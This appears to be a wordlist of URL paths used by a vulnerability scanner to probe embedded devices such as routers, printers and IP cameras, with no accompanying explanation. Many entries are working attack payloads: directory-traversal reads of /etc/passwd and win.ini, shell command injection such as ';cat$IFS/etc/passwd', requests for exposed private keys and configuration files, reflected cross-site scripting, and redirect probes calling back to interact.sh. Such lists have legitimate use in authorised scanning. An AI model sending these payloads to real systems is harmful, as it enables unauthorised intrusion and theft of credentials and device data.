/web_shell_cmd.gch
/current_config/Sha1Account1
/../../etc/passwd
/password.jsn
/about_state
/login?login={{username}}&password={{password}}
/overview.asp

/update.php?jungle=id
/adm/file.cgi?next_file=%2fetc%2fpasswd
/../../../../../../../../../../../../../etc/passwd
/cgi-bin/;cat$IFS/etc/passwd
/command/prima-factory.cgi
/command.cgi?cat%20/etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/action/usermanager.htm
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/../../../../../etc/passwd
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/password.html
/conf/nginx.conf
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/lang/log/httpd.log
/eIMConfiguration
/eid-management
/eid-management-new
/bulk-profile-operation
/cgi-bin/dynamic/config/secure/security.html
/Security/users?auth={{b64auth}}
/cgi-bin/privatekey.pem
/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/request_para.cgi?parameter=wifi_get_5g_host
/SSI/Auth/ip_snmp.htm
/hp/device/webAccess/index.htm?content=security
/Portal0000.htm
/cgi-bin/cgibox?.cab
/cgi-bin/cgibox?/nobody
/portal/conf/config.properties
/images/../../../../../../../../etc/passwd
/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
/password.cgi
/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/js/../../../../../../../../etc/passwd%00.jpg
/setup.cgi?next_file=debug.htm&x=currentsetting.htm
/wt3/forceSave.php?file=/etc/passwd
/Main_Login.asp
/general/status.html
/PRESENTATION/EPSONCONNECT
/
/cgi-bin/home
/login
/hdstat.htm
/login.sh
/login?url=%2F
/cgi-bin/main.cgi
/index.html#en
/login.htm
/sws/index.html
/Solar_Menu.php
/hui/index.html
/logon.htm
/index.html
/login.html
/#
/PRESENTATION/HTML/TOP/PRTINFO.HTML
/index.htm
/hp/device/this.LCDispatcher
/SSI/index.htm
/default.htm
/pages/
/dashboard/
/view/viewer_index.shtml
/pics/logo_70x29px.gif
/webui/device_info/device_info
/cgi-bin/guestimage.html
/Login.htm
/CgiStart?page=Single
/Pages/login.htm
/wbm/index.php
/home.html
/wt2parser.cgi?home_en
/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + 
/hp/device/DeviceInformation/View
/status.html
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh
/fcgi-bin/wgsetcgi
/html/repository
/services/user/values.xml?var=STATUS
/html/device-id
/_syslog.txt
/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/
/loginLess/../../etc/passwd
/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
/self.key
/api/config
/net/net/net.html
/?action=stream
/config/cam_portal.cgi
/mobile.html
/amr
/eSCL/ScannerCapabilities
/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e
/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e
/cgi-bin/nobody/Search.cgi?action=scan
/rootDesc.xml
/api/auth/settings
/displays/nuclei_check.json
